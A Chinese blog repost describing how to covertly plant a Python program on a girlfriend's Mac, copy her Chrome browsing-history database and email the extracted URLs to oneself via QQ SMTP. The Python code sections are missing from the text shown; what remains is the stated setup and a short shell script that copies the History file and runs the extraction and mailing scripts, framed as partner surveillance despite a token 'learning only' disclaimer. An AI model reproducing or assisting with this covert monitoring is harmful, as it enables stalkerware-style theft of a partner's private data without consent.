我用python远程探查女友每天的网页访问记录,她不愧是成年人!

微信扫一扫,分享到朋友圈

我用python远程探查女友每天的网页访问记录,她不愧是成年人!

点击上方“
Python高校
”,关注

你的技术大学

过程:

利用Python制作远程查看别人电脑的操作记录,与其它教程类似,都是通过邮件返回。

利用程序得到目标电脑浏览器当中的访问记录,生产一个文本并发送到你自己的邮箱,当然这个整个过程除了你把python程序植入目标电脑外,其它的操作都是自动化的。

我知道我说到这些,有些人又开始有其它的想法了,可别想了,玩玩、学习可以,违法的事情咱不能干。

我想知道女友每天在干嘛,女友是个富二代,用的是苹果电脑,还有我得说一下她用的是谷歌浏览器,所以你们在实验的时候要修改一些内容。

开发环境

Chrome

Python3.6

macOS Sierra

发送邮件的qq邮箱地址

接受邮件的邮箱地址

SMTP服务器地址 : smtp.qq.com

qq邮箱授权码

实战:

(2) 得到历史记录的Python源代码:

(3) 发送邮件代码:

由此Python脚本可以实现发送得到的地址文本附件发送至目标邮箱,看下面返回的结果:

(4) 到此,其实已经实现欲达到的功能了,但是一共有几个脚本,我们可以整合成一个完整的shell脚本

cp /Users/Marcel/Library/Application Support/Google/Chrome/Default/History /Users/Marcel/Desktop/tmp/code/chrome_history/


python /Users/Marcel/Desktop/tmp/code/chrome_history/get_history.py


python /Users/Marcel/Desktop/tmp/code/chrome_history/send_mail.py /Users/Marcel/Desktop/tmp/code/chrome_history/result.txt

该实践过程会遇到的一些难题:

springcloud项目优雅重启(一):问题和gateway-ribbon流程

上一篇

ARM64 Linux Kernel 5.7无法GDB调试问题

下一篇

你也可能喜欢

我用python远程探查女友每天的网页访问记录,她不愧是成年人!

长按储存图像,分享给朋友